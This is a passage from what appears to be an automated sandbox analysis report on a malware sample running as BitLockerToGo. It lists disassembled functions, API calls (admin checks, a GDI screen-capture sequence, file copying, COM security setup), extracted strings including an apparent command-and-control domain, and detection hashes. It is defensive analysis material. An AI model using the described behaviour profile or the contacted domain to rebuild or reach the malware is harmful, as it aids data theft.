                                                                                                                                                                                        control_flow_graph 248 43a2ca-43a2ff 249 43a300-43a308 248->249 249->249 250 43a30a-43a332 SysAllocString 249->250 251 43a336-43a33b 250->251
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                        • Opcode ID: f200db4fca39053ab5bd00962dc80bab007449fdc3bc0a8806d2572082aa45aa
                                                                                                                                                                                        • Instruction ID: d36da009cc4dd5e60bddc90643fe47231d8199f9552208d5b93d0083e1a6bc38
                                                                                                                                                                                        • Opcode Fuzzy Hash: f200db4fca39053ab5bd00962dc80bab007449fdc3bc0a8806d2572082aa45aa
                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F0E2B45083419FD340CF24D888A6AFBF4BB8A358F109D5DE49A9B242CB75D90ACB56
                                                                                                                                                                                        Function 0043ACB0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: c2020858f1e77380c894873f28cf591c0b29d80ba21badbd67f27b9ff3b0a383
                                                                                                                                                                                        • Instruction ID: 2ef5a6a48b743b0f54ab3efd7c0e39c5e11684ee4858ef7e1b94a1d861c570b7
                                                                                                                                                                                        • Opcode Fuzzy Hash: c2020858f1e77380c894873f28cf591c0b29d80ba21badbd67f27b9ff3b0a383
                                                                                                                                                                                        • Instruction Fuzzy Hash: E42137729483108BD7255E28849033FBBD2ABCD311F1A953FDCDA8B781D63888515387
                                                                                                                                                                                        Function 0040CCF0 Relevance: 7.7, APIs: 5, Instructions: 177threadCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 155 40ccf0-40ccfe call 43f2d0 158 40cd04-40cd11 IsUserAnAdmin call 437160 155->158 159 40cebf-40cec1 ExitProcess 155->159 162 40cd17-40cd35 GetInputState 158->162 163 40ceba call 43fea0 158->163 164 40cd40-40cd52 162->164 163->159 164->164 166 40cd54-40cd7f GetCurrentThreadId GetCurrentProcessId 164->166 167 40cd80-40cda8 166->167 167->167 168 40cdaa-40cdb3 167->168 169 40cdc0-40cdd2 168->169 169->169 170 40cdd4-40cdd6 169->170 171 40ce04-40ce23 170->171 172 40cdd8-40cde9 170->172 173 40ce30-40cea5 171->173 174 40cdf0-40ce02 172->174 173->173 175 40cea7-40ceae call 40dd30 173->175 174->171 174->174 175->163 178 40ceb0 call 410ed0 175->178 180 40ceb5 call 40fa90 178->180 180->163
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2882748383-0
                                                                                                                                                                                        • Opcode ID: 2fc890891636a5cbb3b5a9e1d9161056095969d2b8c912405932f686e90a896f
                                                                                                                                                                                        • Instruction ID: 68d0f77aac29047e394b0bbc2eaef3045501e8c1bd0db20cb41e468de86552c5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fc890891636a5cbb3b5a9e1d9161056095969d2b8c912405932f686e90a896f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A418B3651C3508BD700AB78989625FBFC2DFD3320F198A3ED5D1973D1DA3848068796
                                                                                                                                                                                        Function 004400BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 194 4400ba-4400c6 195 4400d0-4400ea 194->195 195->195 196 4400ec-440136 GetForegroundWindow call 443190 195->196
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00440105
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                        • String ID: &'&!
                                                                                                                                                                                        • API String ID: 2020703349-380169441
                                                                                                                                                                                        • Opcode ID: 96905d6e1bcf70d78b9b649e623a1f7db9eac75b98cf7dc2506f5934903c6764
                                                                                                                                                                                        • Instruction ID: 080031c3278ea8674fddb578f845b271c6be9ac379e19be31f66d338dd870478
                                                                                                                                                                                        • Opcode Fuzzy Hash: 96905d6e1bcf70d78b9b649e623a1f7db9eac75b98cf7dc2506f5934903c6764
                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F02B3AA182404BF3059B38A8656977BE4DB13319F10483AE5C1C7341D33AC504CB0A
                                                                                                                                                                                        Function 0043FEC0 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 235 43fec0-43fed5 236 43ff57-43ff60 call 43daf0 235->236 237 43feea-43ff03 235->237 238 43fedc-43fee3 235->238 239 43ff4c-43ff55 call 43da60 235->239 246 43ff62 236->246 240 43ff10-43ff35 237->240 238->236 238->237 247 43ff65-43ff68 239->247 240->240 243 43ff37-43ff4a RtlReAllocateHeap 240->243 243->246 246->247
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043FF44
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                        • Opcode ID: 275ef8408927c5be473a40f6ed5ea4006717021c27589da326475695a5c6d16f
                                                                                                                                                                                        • Instruction ID: dcd895625f1de5df88afb4bc5f5436ec368ba6403bae32710f3a591e680433b3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 275ef8408927c5be473a40f6ed5ea4006717021c27589da326475695a5c6d16f
                                                                                                                                                                                        • Instruction Fuzzy Hash: B00168B1F092018BF300AB34ED51B2B7B9ADBCD310F18893DE88047281D2398809C795
                                                                                                                                                                                        Function 0043DAF0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 252 43daf0-43dafe 253 43db05-43db08 252->253 254 43db09-43db19 252->254 255 43db20-43db32 254->255 255->255 256 43db34-43db49 RtlFreeHeap 255->256
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043DB40
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                        • Opcode ID: a43016886cdb0d743cdf735ff3d04aa6dd5a06897827434755ebaf309b3355ac
                                                                                                                                                                                        • Instruction ID: 5629ad98e0ceb0e45337e72c9cd8d3a1c03c698a450e6e024db0fd128c61433c
                                                                                                                                                                                        • Opcode Fuzzy Hash: a43016886cdb0d743cdf735ff3d04aa6dd5a06897827434755ebaf309b3355ac
                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F0A03450C2408BDB086B34FC62A2A7BA1EF86711F54447CD08A466E1DA3A983ADB56
                                                                                                                                                                                        Function 004400F7 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 291 4400f7-44010e GetForegroundWindow call 443190 294 440113-440136 291->294
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00440105
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ForegroundWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2020703349-0
                                                                                                                                                                                        • Opcode ID: 2d53d53f86e8266488540f03f412994494972a2bb33454c47b24931968afb91b
                                                                                                                                                                                        • Instruction ID: 68f716a54a03f872c95ad112db681d3eb3fa2aa5e9f4ee1e80c164f252ba4ef0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d53d53f86e8266488540f03f412994494972a2bb33454c47b24931968afb91b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE08C7EA042409FD600AF28FCA642537A0EF0621A3440439E086CB362C735A644CA09
                                                                                                                                                                                        Function 0043FF80 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 295 43ff80-43ffb2 LdrInitializeThunk
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(004434FD,005C003F,00000006,?,?,00000018,?,?,?), ref: 0043FFAE
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                        Function 0043A346 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A358
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                        • Opcode ID: 43abf5545444225f419111632cb8d1e94a3e61122dabe52b65dcb97108d652bb
                                                                                                                                                                                        • Instruction ID: 6f453a55023168f30735fce91ea22db8b17a31a17328c721d80c23302acec5c7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 43abf5545444225f419111632cb8d1e94a3e61122dabe52b65dcb97108d652bb
                                                                                                                                                                                        • Instruction Fuzzy Hash: E2D04C347D8304B6F1310B14ED17F043554B743F02F601060B3417C0E0CAF1A651965D
                                                                                                                                                                                        Function 00410EF1 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410F03
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                        • Opcode ID: 1b0f1440dc0fa9025065666765f27c91c3b8525b7be54efba2bc4527c6656d71
                                                                                                                                                                                        • Instruction ID: 5bdc67afd1bde314a650b6f36decfface19dcbc0d6ae9af54b624d83bc5720f4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b0f1440dc0fa9025065666765f27c91c3b8525b7be54efba2bc4527c6656d71
                                                                                                                                                                                        • Instruction Fuzzy Hash: DAD048743E8300B6F2340B48AC07F043110A302F22F700364F3207C2E08AE031019A6D
                                                                                                                                                                                        Function 0043DAD2 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043DADB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                        • Opcode ID: 94a17b276a87613f611fa3253c375c9f7ab6d74ea5cf1adef94027d786bfcf13
                                                                                                                                                                                        • Instruction ID: b66404a8562981d389c2e45b4d4f17b20996c760ea210aa5d99397a2825b418a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 94a17b276a87613f611fa3253c375c9f7ab6d74ea5cf1adef94027d786bfcf13
                                                                                                                                                                                        • Instruction Fuzzy Hash: A8C09B332441045FD9011F48FC057457B51EF9037AF240076F20D44072C113D47BD785
                                                                                                                                                                                        Function 00410ED0 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00410EE1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                        • Opcode ID: bbd77bbbaa78ab2fd35300d1c21581c4fac3a16d396d5e7349d72c7064b746c3
                                                                                                                                                                                        • Instruction ID: 3886785bc919117983b5e2e65c9cc7ead0b4095c3f446d394963118649a368ad
                                                                                                                                                                                        • Opcode Fuzzy Hash: bbd77bbbaa78ab2fd35300d1c21581c4fac3a16d396d5e7349d72c7064b746c3
                                                                                                                                                                                        • Instruction Fuzzy Hash: F8C08C20428108ABF210272EAC0AF83392CE703726F400330B5E0400D1AE206815D5FB

                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                        Function 004117F1 Relevance: 37.9, APIs: 1, Strings: 24, Instructions: 375COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004354A0: GetDC.USER32(00000000), ref: 004354A9
                                                                                                                                                                                          • Part of subcall function 004354A0: GetSystemMetrics.USER32(0000004C), ref: 004354B9
                                                                                                                                                                                          • Part of subcall function 004354A0: GetSystemMetrics.USER32(0000004D), ref: 004354C1
                                                                                                                                                                                          • Part of subcall function 004354A0: GetCurrentObject.GDI32(00000000,00000007), ref: 004354CA
                                                                                                                                                                                          • Part of subcall function 004354A0: GetObjectW.GDI32(00000000,00000018,?), ref: 004354DA
                                                                                                                                                                                          • Part of subcall function 004354A0: DeleteObject.GDI32(00000000), ref: 004354E9
                                                                                                                                                                                          • Part of subcall function 004354A0: CreateCompatibleDC.GDI32(00000000), ref: 004354F0
                                                                                                                                                                                          • Part of subcall function 004354A0: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004354FB
                                                                                                                                                                                          • Part of subcall function 004354A0: SelectObject.GDI32(00000000,00000000), ref: 00435507
                                                                                                                                                                                          • Part of subcall function 004354A0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043552E
                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00411806
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelectUninitialize
                                                                                                                                                                                        • String ID: &A-C$,%"3$5Q<S$6E+G$7U9W$8]S_$<?$<Y?[$>M"O$E-A/$GuD$I)^+$M%E'$O9M;$P!N#$eI?K$gjzF$htr^$il~l$jabc$jxdV$kbe;$sergei-esenin.com${`st
                                                                                                                                                                                        • API String ID: 3213364925-889322202
                                                                                                                                                                                        • Opcode ID: 622ff4342a46816667bb6ab0709b25f33cb09700fe0beee6a95200916cb37c7f
                                                                                                                                                                                        • Instruction ID: 36dcdd82a7f83c00345b3f5b4ec2262732fa0cd4334e380ffb4ab3e4d33bf01d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 622ff4342a46816667bb6ab0709b25f33cb09700fe0beee6a95200916cb37c7f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 81C1FDB050C3D18BD334CF2584907EBBFE1AF96344F18896ED4C99B252D339854ACB9A
                                                                                                                                                                                        Function 004354A0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 004354A9
                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004C), ref: 004354B9
                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004D), ref: 004354C1
                                                                                                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 004354CA
                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 004354DA
                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004354E9
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004354F0
                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004354FB
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00435507
                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0043552E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                                                                                                                                        • String ID: ~v
                                                                                                                                                                                        • API String ID: 1298755333-1224970894
                                                                                                                                                                                        • Opcode ID: 2710fc76ac39a7e4136b70b69dccefce0c7633cc697c2282086f9d5922e30ccb
                                                                                                                                                                                        • Instruction ID: e54191557be699bff73bfda36a86c59336cf228f46f3af899c14f39e48e605c4
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2710fc76ac39a7e4136b70b69dccefce0c7633cc697c2282086f9d5922e30ccb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1981E43A519310EFD7005F74AC95B2B7BA8FF8E362F440C2DF68293251D37999068B66
                                                                                                                                                                                        Function 00439730 Relevance: 24.1, Strings: 19, Instructions: 309COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 9$<$<$<$>$>$>$?$?$B$G$H$R$]$]$a$b$l$r
                                                                                                                                                                                        • API String ID: 0-2109406571
                                                                                                                                                                                        • Opcode ID: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
                                                                                                                                                                                        • Instruction ID: ba4219b93cf003f79d323fad9c8f3b226601b2dcf74e21560defbc11d0431b81
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7758ab2323f733c805dad363617498de5dd35665a14e8358bc4dd6e5edbdaf38
                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B13563B0C7D08AD315947C889135FEEC25BEA224F2D8A6ED4E5C7386D1ADC806C367
                                                                                                                                                                                        Function 00438DEA Relevance: 22.8, Strings: 18, Instructions: 284COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: ($0$3$<$>$@$E$a$a$b$d$m$o$t$x$z$|$}
                                                                                                                                                                                        • API String ID: 0-862652950
                                                                                                                                                                                        • Opcode ID: 90bd488a9bde32cceee13385ee99031e322b9466ae9e13f163cd89612b6db730
                                                                                                                                                                                        • Instruction ID: abcf8e67d15c9e7935c61b3256e4ac0ca23618b4ab1b9352928e118b51437ebf
                                                                                                                                                                                        • Opcode Fuzzy Hash: 90bd488a9bde32cceee13385ee99031e322b9466ae9e13f163cd89612b6db730
                                                                                                                                                                                        • Instruction Fuzzy Hash: D2E18231D086E98ADB32C63C8C483DDBFA15B57324F1843D9D0A96B3D2C7794A86CB56
                                                                                                                                                                                        Function 0042E940 Relevance: 20.4, APIs: 3, Strings: 7, Instructions: 2913COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: &@>T$)S$Q$;(4M$>PFp$GuD$8t$_]
                                                                                                                                                                                        • API String ID: 0-2235818561
                                                                                                                                                                                        • Opcode ID: 2387a7863a87df60774773106f68999b1d14b82e086a2dedc8d9c882554df82c
                                                                                                                                                                                        • Instruction ID: 8559bd9a3f12d4673c03545aca54df3080253870166e9a019c10ab4db4e407e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2387a7863a87df60774773106f68999b1d14b82e086a2dedc8d9c882554df82c
                                                                                                                                                                                        • Instruction Fuzzy Hash: B9131970604B918FE3258F35C4A17A3BBE1AF57304F5889AEC0EB8B392D7796406CB55
                                                                                                                                                                                        Function 0042AD8C Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 432fileCOMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CopyFileW.KERNEL32(?,hxufvd;H=Qm}y`pb,00000000,00000001,00000001), ref: 0042B005
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                        • String ID: ,O$M$/G/E$=Qm}$hxuf$hxufvd;H=Qm}y`pb$m`he$vd;H$y`pb
                                                                                                                                                                                        • API String ID: 1304948518-2816269737
                                                                                                                                                                                        • Opcode ID: d4bd07e5a33319ecab134c712bb40c046b59941a8debbffea7e0615adf3dab69
                                                                                                                                                                                        • Instruction ID: b26c4530accf169da017ebeff49a89a35205cbf71de33c7df546c56bd75f58e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: d4bd07e5a33319ecab134c712bb40c046b59941a8debbffea7e0615adf3dab69
                                                                                                                                                                                        • Instruction Fuzzy Hash: 27C147B5A00224CFDB08CF64DC9176A7BB2FF59304F2981ADD8016B395EB399911CBD9
                                                                                                                                                                                        Function 0041D8C8 Relevance: 14.6, Strings: 11, Instructions: 869COMMON
                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 5:',$CFGD$DE$HuGG$J^Lv$Q_T\$SNK~$V]E^$^d^c$r!o#${%g'
